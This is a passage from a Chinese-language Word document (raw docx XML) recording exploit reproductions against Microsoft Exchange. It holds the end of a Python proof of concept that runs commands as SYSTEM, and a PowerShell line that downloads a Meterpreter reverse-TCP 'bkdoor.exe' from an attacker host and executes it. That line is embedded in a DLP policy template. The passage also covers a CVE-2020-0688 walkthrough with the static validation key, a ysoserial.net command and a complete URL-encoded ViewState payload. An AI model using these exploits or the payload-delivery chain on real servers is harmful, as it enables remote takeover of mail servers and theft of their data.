        <w:t xml:space="preserve">    print("(+) found the __viewstate: %s" % vs)</w:t>
        <w:br/>
        <w:t xml:space="preserve">    trigger_rce(t, s, vs, cmd)</w:t>
        <w:br/>
        <w:t xml:space="preserve">    print("(+) executed %s as SYSTEM!" % cmd)</w:t>
        <w:br/>
        <w:t/>
        <w:br/>
        <w:t/>
        <w:br/>
        <w:t>if __name__ == '__main__':</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if len(sys.argv) != 4:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        print("(+) usage: %s &lt;target&gt; &lt;user:pass&gt; &lt;cmd&gt;" % sys.argv[0])</w:t>
        <w:br/>
        <w:t xml:space="preserve">        print("(+) eg: %s 192.168.75.142 harrym@exchangedemo.com:user123### mspaint" % sys.argv[0])</w:t>
        <w:br/>
        <w:t xml:space="preserve">        sys.exit(-1)</w:t>
        <w:br/>
        <w:t xml:space="preserve">    trgt = sys.argv[1]</w:t>
        <w:br/>
        <w:t xml:space="preserve">    assert ":" in sys.argv[2], "(-) you need a user and password!"</w:t>
        <w:br/>
        <w:t xml:space="preserve">    usr = sys.argv[2].split(":")[0]</w:t>
        <w:br/>
        <w:t xml:space="preserve">    pwd = sys.argv[2].split(":")[1]</w:t>
        <w:br/>
        <w:t xml:space="preserve">    cmd = sys.argv[3]</w:t>
        <w:br/>
        <w:t xml:space="preserve">    main(trgt, usr, pwd, cmd)</w:t>
        <w:br/>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="241"/>
    <w:bookmarkStart w:name="u992f581e" w:id="242"/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50" w:line="360" w:lineRule="auto" w:beforeLines="100"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:name="u1d30452a" w:id="243"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:ascii="宋体"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5842000" cy="282160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22266" cy="426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"/>
    </w:p>
    <w:bookmarkEnd w:id="242"/>
    <w:bookmarkStart w:name="eqy4y" w:id="24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python3 poc.py &lt;target_ip&gt; &lt;user:pass&gt; &lt;cmd&gt;</w:t>
        <w:br/>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="244"/>
    <w:bookmarkStart w:name="ue4d18fce" w:id="245"/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50" w:line="360" w:lineRule="auto" w:beforeLines="100"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:name="u3ef6979c" w:id="246"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:ascii="宋体"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5841999" cy="18284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6"/>
    </w:p>
    <w:bookmarkEnd w:id="245"/>
    <w:bookmarkStart w:name="u58789a1a" w:id="2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262626"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>成功执行命令，生成1.txt文件</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="247"/>
    <w:bookmarkStart w:name="PtQ8J" w:id="248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4c4948"/>
        </w:rPr>
        <w:t>metasploit利用</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="248"/>
    <w:bookmarkStart w:name="u4778af93" w:id="2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c4948"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>上面我们已经达到了命令执行的效果，但是我们不能每次都通过命令执行的漏洞进行命令执行操作，这样不够方便，也不够稳定，因此我们选用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b/>
          <w:i w:val="false"/>
          <w:color w:val="4c4948"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>metasploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="4c4948"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="249"/>
    <w:bookmarkStart w:name="u578698ba" w:id="2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c4948"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>在这里不对metasploit的使用进行赘述，可以参考</w:t>
      </w:r>
      <w:bookmarkStart w:name="NlAOM" w:id="251"/>
      <w:bookmarkEnd w:id="251"/>
      <w:hyperlink r:id="rId55">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
            <w:b w:val="false"/>
            <w:i w:val="false"/>
            <w:color w:val="0000ff"/>
            <w:sz w:val="21"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://lhl7.github.io/2022/03/26/Metasploit%E7%9A%84%E4%BD%BF%E7%94%A8%E7%AC%94%E8%AE%B0/</w:t>
        </w:r>
      </w:hyperlink>
      <w:bookmarkStart w:name="NlAOM" w:id="252"/>
      <w:bookmarkEnd w:id="252"/>
    </w:p>
    <w:bookmarkEnd w:id="250"/>
    <w:bookmarkStart w:name="ud26b07cf" w:id="2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c4948"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>在生成了木马文件后，在kali上部署服务，将木马文件放置在var/www/html目录下，然后运行apache2服务。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="253"/>
    <w:bookmarkStart w:name="u7e9f674f" w:id="2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c4948"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>这样一来，我们可以通过访问uri的方式下载木马文件，通过如下语句，即可下载并执行木马文件。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="254"/>
    <w:bookmarkStart w:name="JLnwl" w:id="25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(Invoke-WebRequest -Uri http://192.168.6.130/meter_re_tcp_x86.exe -OutFile C:\Users\86183\Desktop\bkdoor.exe) ; (C:\Users\86183\Desktop\bkdoor.exe)</w:t>
        <w:br/>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="255"/>
    <w:bookmarkStart w:name="uc981bfc9" w:id="2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c4948"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>注：此处连接符不能用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="4c4948"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="f47466"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>-and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="4c4948"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>，因为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="f47466"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>-and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="4c4948"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>连接符会导致第一句中文件还没下载结束前，第二句就已经开始执行，导致返回false。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="256"/>
    <w:bookmarkStart w:name="ub9f2d0da" w:id="2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4c4948"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>我们将上述内容粘贴进xml文件的相应位置（如自动化执行，只需要更改输入的参数）：</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="257"/>
    <w:bookmarkStart w:name="kuGWo" w:id="25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&lt;?xml version="1.0" encoding="UTF-8"?&gt;</w:t>
        <w:br/>
        <w:t>&lt;dlpPolicyTemplates&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;dlpPolicyTemplate id="F7C29AEC-A52D-4502-9670-141424A83FAB" mode="Audit" state="Enabled" version="15.0.2.0"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;contentVersion&gt;4&lt;/contentVersion&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;publisherName&gt;Microsoft&lt;/publisherName&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;name&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">      &lt;localizedString lang="en"&gt;PCI-DSS-12345&lt;/localizedString&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;/name&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;description&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">      &lt;localizedString lang="en"&gt;Detects the presence of information subject to Payment Card Industry Data Security Standard (PCI-DSS) compliance requirements.&lt;/localizedString&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;/description&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;keywords&gt;&lt;/keywords&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;ruleParameters&gt;&lt;/ruleParameters&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;policyCommands&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">      &lt;!-- The contents below are applied/executed as rules directly in PS - --&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">      &lt;commandBlock&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">        &lt;![CDATA[ $i=New-object System.Diagnostics.ProcessStartInfo;$i.UseShellExecute=$true;$i.FileName="cmd";$i.Arguments="/c (Invoke-WebRequest -Uri http://192.168.6.130/meter_re_tcp_x86.exe -OutFile C:\Users\86183\Desktop\bkdoor.exe) ; (C:\Users\86183\Desktop\bkdoor.exe)";$r=New-Object System.Diagnostics.Process;$r.StartInfo=$i;$r.Start(); ]]&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">      &lt;/commandBlock&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;/policyCommands&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;policyCommandsResources&gt;&lt;/policyCommandsResources&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;/dlpPolicyTemplate&gt;</w:t>
        <w:br/>
        <w:t>&lt;/dlpPolicyTemplates&gt;</w:t>
        <w:br/>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="258"/>
    <w:bookmarkStart w:name="rQXjZ" w:id="25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CVE-2020-0688</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="259"/>
    <w:bookmarkStart w:name="u76bfd75a" w:id="260"/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50" w:line="360" w:lineRule="auto" w:beforeLines="100"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:name="ua3uO" w:id="261"/>
      <w:bookmarkEnd w:id="261"/>
      <w:hyperlink r:id="rId56">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
            <w:b w:val="false"/>
            <w:i w:val="false"/>
            <w:color w:val="0000ff"/>
            <w:sz w:val="21"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://fdlucifer.github.io/2020/10/12/cve-2020-0688/</w:t>
        </w:r>
      </w:hyperlink>
      <w:bookmarkStart w:name="ua3uO" w:id="262"/>
      <w:bookmarkEnd w:id="262"/>
    </w:p>
    <w:bookmarkEnd w:id="260"/>
    <w:bookmarkStart w:name="u1e5644d5" w:id="263"/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50" w:line="360" w:lineRule="auto" w:beforeLines="100"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:hyperlink r:id="rId5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1"/>
          </w:rPr>
          <w:t>Exchange CVE-2020-0688代码执行漏洞分析 - nice_0e3 - 博客园</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:bookmarkEnd w:id="263"/>
    <w:bookmarkStart w:name="u7bdec696" w:id="2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1"/>
        </w:rPr>
        <w:t>工具：</w:t>
      </w:r>
      <w:hyperlink r:id="rId58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https://github.com/Jumbo-WJB/CVE-2020-0688</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:bookmarkEnd w:id="264"/>
    <w:bookmarkStart w:name="Qj5wC" w:id="2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漏洞描述</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="265"/>
    <w:bookmarkStart w:name="u0f1bc4f0" w:id="2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这个漏洞是由于Exchange服务器在安装时没有正确地创建唯一的加密密钥所造成的。Exchange Server在安装后的web.config文件中都拥有相同的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="fbde28"/>
        </w:rPr>
        <w:t>validationKey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和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="fbde28"/>
        </w:rPr>
        <w:t>decryptionKey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。这些密钥用于保证ViewState的安全性。而</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="fbde28"/>
        </w:rPr>
        <w:t>ViewState是ASP.NET Web应用以序列化格式存储在客户机上的服务端数据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。客户端通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="fbde28"/>
        </w:rPr>
        <w:t>__VIEWSTATE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请求参数将这些数据返回给服务器。攻击者可以在ExchangeControl Panel web应用上执行任意.net代码。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="266"/>
    <w:bookmarkStart w:name="u9d6c649f" w:id="2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当攻击者通过各种手段获得一个可以访问Exchange Control Panel （ECP）组件的用户账号密码时。攻击者可以在被攻击的exchange上执行任意代码，直接获取服务器权限。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="267"/>
    <w:bookmarkStart w:name="ufb41acc3" w:id="2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漏洞产生的主要原因就是在Exchange ECP组件中发现，邮件服务在安装的过程中不会随机生成秘钥，也就是说所有默认安装的Exchange服务器中的validationKey和decryptionKey的值都是相同的，攻击者可以利用静态秘钥对服务器发起攻击，在服务器中以SYSTEM权限远程执行代码。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="268"/>
    <w:bookmarkStart w:name="u83a6de9e" w:id="2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由于Exchange Server在安装部署时未能创建应用唯一的加密密钥，导致Exchange Server在反序列化处理请求中的 __VIEWSTATE 数据触发远程代码执行。Exchange 是以SYSTEM权限启用的IIS，因此普通登录用户也可通过反序列化达到提权的目的，进而可以获取域管理的权限。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="269"/>
    <w:bookmarkStart w:name="DwRRB" w:id="27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影响版本</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="270"/>
    <w:bookmarkStart w:name="u71ed0162" w:id="2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1"/>
        </w:rPr>
        <w:t>Microsoft Exchange Server 2010 Service Pack 3</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="271"/>
    <w:bookmarkStart w:name="u706f2744" w:id="2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1"/>
        </w:rPr>
        <w:t>Microsoft Exchange Server 2013</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="272"/>
    <w:bookmarkStart w:name="u53a91b73" w:id="2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1"/>
        </w:rPr>
        <w:t>Microsoft Exchange Server 2016</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="273"/>
    <w:bookmarkStart w:name="ub7eefe3e" w:id="2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1"/>
        </w:rPr>
        <w:t>Microsoft Exchange Server 2019</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="274"/>
    <w:bookmarkStart w:name="IABCl" w:id="27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漏洞复现</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="275"/>
    <w:bookmarkStart w:name="L3t6i" w:id="276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条件：</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="276"/>
    <w:bookmarkStart w:name="u1a83ec2a" w:id="2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555555"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>需要变量：</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="277"/>
    <w:bookmarkStart w:name="Stydj" w:id="27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–validationkey = CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF（默认，漏洞产生原因）</w:t>
        <w:br/>
        <w:t xml:space="preserve"> –validationalg = SHA1（默认，漏洞产生原因）</w:t>
        <w:br/>
        <w:t xml:space="preserve"> –generator=B97B4E27（基本默认）</w:t>
        <w:br/>
        <w:t xml:space="preserve"> –viewstateuserkey = ASP.NET_SessionId（手工获取，变量，每次登陆都不一致）</w:t>
        <w:br/>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="278"/>
    <w:bookmarkStart w:name="u3493ebbb" w:id="2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在这四个变量中，前两个为默认固定，viewstateuserkey和generator的值需要从经过身份验证的session中收集。viewstateuserkey可以从ASP.NET的_SessionID cookie中获取，而generator可以在一个隐藏字段__VIEWSTATEGENERATOR中找到。所有这些都可以通过浏览器中的工具轻松获取。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="279"/>
    <w:bookmarkStart w:name="u0d7dbffa" w:id="2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获取viewstateuserkey和generator值:</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="280"/>
    <w:bookmarkStart w:name="u6fa8a766" w:id="2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1"/>
        </w:rPr>
        <w:t>正常登录后，访问/ecp/default.aspx页面。使用F12开发人员工具的“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:shd w:fill="fbde28"/>
        </w:rPr>
        <w:t>Network</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>”选项，刷新页面，重新发送请求，并在登录时查找/ecp/default.aspx的原始响应。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="281"/>
    <w:bookmarkStart w:name="u2d63f8c2" w:id="282"/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50" w:line="360" w:lineRule="auto" w:beforeLines="100"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:name="u987fad5b" w:id="283"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:ascii="宋体"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5841999" cy="236598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904133" cy="48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3"/>
    </w:p>
    <w:bookmarkEnd w:id="282"/>
    <w:bookmarkStart w:name="u12628256" w:id="2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如上图，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>该__VIEWSTATEGENERATOR值在页面源中可见。在此示例中，其值为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B97B4E27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>。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="284"/>
    <w:bookmarkStart w:name="u9c87b95e" w:id="2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打开Headers标签并在中找到ASP.NET_SessionId cookie：</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="285"/>
    <w:bookmarkStart w:name="ueef401b4" w:id="286"/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50" w:line="360" w:lineRule="auto" w:beforeLines="100"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:name="ub5cec972" w:id="287"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:ascii="宋体"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5842000" cy="25354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0" cy="518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7"/>
    </w:p>
    <w:bookmarkEnd w:id="286"/>
    <w:bookmarkStart w:name="u043e132f" w:id="2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在此示例中，其值为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3e13f2bc-9bc7-4719-8665-9979b294053f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>。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="288"/>
    <w:bookmarkStart w:name="UdqaE" w:id="28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555555"/>
        </w:rPr>
        <w:t>使用工具生成payload</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="289"/>
    <w:bookmarkStart w:name="u860d0cb7" w:id="290"/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50" w:line="360" w:lineRule="auto" w:beforeLines="100"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:hyperlink r:id="rId61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ysoserial.net下载</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:bookmarkEnd w:id="290"/>
    <w:bookmarkStart w:name="u108cbd38" w:id="2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555555"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>生成启动计算器calc.exe的payload：</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="291"/>
    <w:bookmarkStart w:name="FX17z" w:id="29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ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "calc.exe" --validationalg="SHA1" --validationkey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" --generator="B97B4E27" --viewstateuserkey="3991dd86-a397-46ce-a262-328e591eb8fd" --isdebug --islegacy</w:t>
        <w:br/>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="292"/>
    <w:bookmarkStart w:name="uc53a22dc" w:id="2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得到Payload:</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="293"/>
    <w:bookmarkStart w:name="H7pN2" w:id="29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</w:t>
        <w:br/>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="294"/>
    <w:bookmarkStart w:name="u354b3fc9" w:id="2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555555"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>生成完payload代码后，需要对该代码中的特殊字符进行URL Encode编码构造一个URL</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="295"/>
    <w:bookmarkStart w:name="uwxzV" w:id="29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/ecp/default.aspx?__VIEWSTATEGENERATOR=&lt;generator&gt;&amp;__VIEWSTATE=&lt;ViewState&gt;</w:t>
        <w:br/>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="296"/>
    <w:bookmarkStart w:name="ueda8510b" w:id="2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555555"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>将最开始获得的__VIEWSTATEGENERATOR值替换generator，将URL Encode编码后的payload替换ViewState。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="297"/>
    <w:bookmarkStart w:name="I7b06" w:id="29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?__VIEWSTATEGENERATOR=B97B4E27&amp;__VIEWSTATE=%2FwEylQcAAQAAAP%2F%2F%2F%2F8BAAAAAAAAAAwCAAAAXk1pY3Jvc29mdC5Qb3dlclNoZWxsLkVkaXRvciwgVmVyc2lvbj0zLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTMxYmYzODU2YWQzNjRlMzUFAQAAAEJNaWNyb3NvZnQuVmlzdWFsU3R1ZGlvLlRleHQuRm9ybWF0dGluZy5UZXh0Rm9ybWF0dGluZ1J1blByb3BlcnRpZXMBAAAAD0ZvcmVncm91bmRCcnVzaAECAAAABgMAAAC3BTw%2FeG1sIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9InV0Zi0xNiI%2FPg0KPE9iamVjdERhdGFQcm92aWRlciBNZXRob2ROYW1lPSJTdGFydCIgSXNJbml0aWFsTG9hZEVuYWJsZWQ9IkZhbHNlIiB4bWxucz0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93aW5meC8yMDA2L3hhbWwvcHJlc2VudGF0aW9uIiB4bWxuczpzZD0iY2xyLW5hbWVzcGFjZTpTeXN0ZW0uRGlhZ25vc3RpY3M7YXNzZW1ibHk9U3lzdGVtIiB4bWxuczp4PSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dpbmZ4LzIwMDYveGFtbCI%2BDQogIDxPYmplY3REYXRhUHJvdmlkZXIuT2JqZWN0SW5zdGFuY2U%2BDQogICAgPHNkOlByb2Nlc3M%2BDQogICAgICA8c2Q6UHJvY2Vzcy5TdGFydEluZm8%2BDQogICAgICAgIDxzZDpQcm9jZXNzU3RhcnRJbmZvIEFyZ3VtZW50cz0iL2MgY2FsYy5leGUiIFN0YW5kYXJkRXJyb3JFbmNvZGluZz0ie3g6TnVsbH0iIFN0YW5kYXJkT3V0cHV0RW5jb2Rpbmc9Int4Ok51bGx9IiBVc2VyTmFtZT0iIiBQYXNzd29yZD0ie3g6TnVsbH0iIERvbWFpbj0iIiBMb2FkVXNlclByb2ZpbGU9IkZhbHNlIiBGaWxlTmFtZT0iY21kIiAvPg0KICAgICAgPC9zZDpQcm9jZXNzLlN0YXJ0SW5mbz4NCiAgICA8L3NkOlByb2Nlc3M%2BDQogIDwvT2JqZWN0RGF0YVByb3ZpZGVyLk9iamVjdEluc3RhbmNlPg0KPC9PYmplY3REYXRhUHJvdmlkZXI%2BC1y1ltAs9%2FZUCwgWqfomTaaD8sch</w:t>
        <w:br/>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="298"/>
    <w:bookmarkStart w:name="u805fb5fa" w:id="2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555555"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>访问地址并成功执行</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="299"/>
    <w:bookmarkStart w:name="u1a54cd78" w:id="3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555555"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>访问构造好的URL地址，服务器会弹出500的错误，但攻击其实成功了。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="300"/>
    <w:bookmarkStart w:name="ub5d8a6ad" w:id="3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555555"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>登录服务器查看进程，发现计算器成功启动。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="301"/>
    <w:bookmarkStart w:name="ue18bdd9f" w:id="302"/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50" w:line="360" w:lineRule="auto" w:beforeLines="100"/>
        <w:ind w:left="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:name="ue9284839" w:id="303"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:ascii="宋体"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5841999" cy="438738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75866" cy="44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3"/>
    </w:p>
    <w:bookmarkEnd w:id="302"/>
    <w:bookmarkStart w:name="kC0GA" w:id="304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SharePoint</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="304"/>
    <w:bookmarkStart w:name="uedeac844" w:id="305"/>
    <w:bookmarkEnd w:id="305"/>
    <w:bookmarkStart w:name="BBSLM" w:id="30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其他漏洞复现</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="306"/>
    <w:bookmarkStart w:name="zQA8R" w:id="30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333333"/>
        </w:rPr>
        <w:t>CVE-2022-28219</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="307"/>
    <w:bookmarkStart w:name="ozS9C" w:id="3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知识点</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="308"/>
    <w:bookmarkStart w:name="u35bca76e" w:id="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XXE Jar协议</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="309"/>
    <w:bookmarkStart w:name="pSDMu" w:id="3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环境搭建</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="310"/>
    <w:bookmarkStart w:name="u6263b806" w:id="311"/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50" w:line="360" w:lineRule="auto" w:beforeLines="100"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:hyperlink r:id="rId6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https://archives2.manageengine.com/active-directory-audit/7055/Manageengine_ADAudit_Plus_x64.exe</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:bookmarkEnd w:id="311"/>
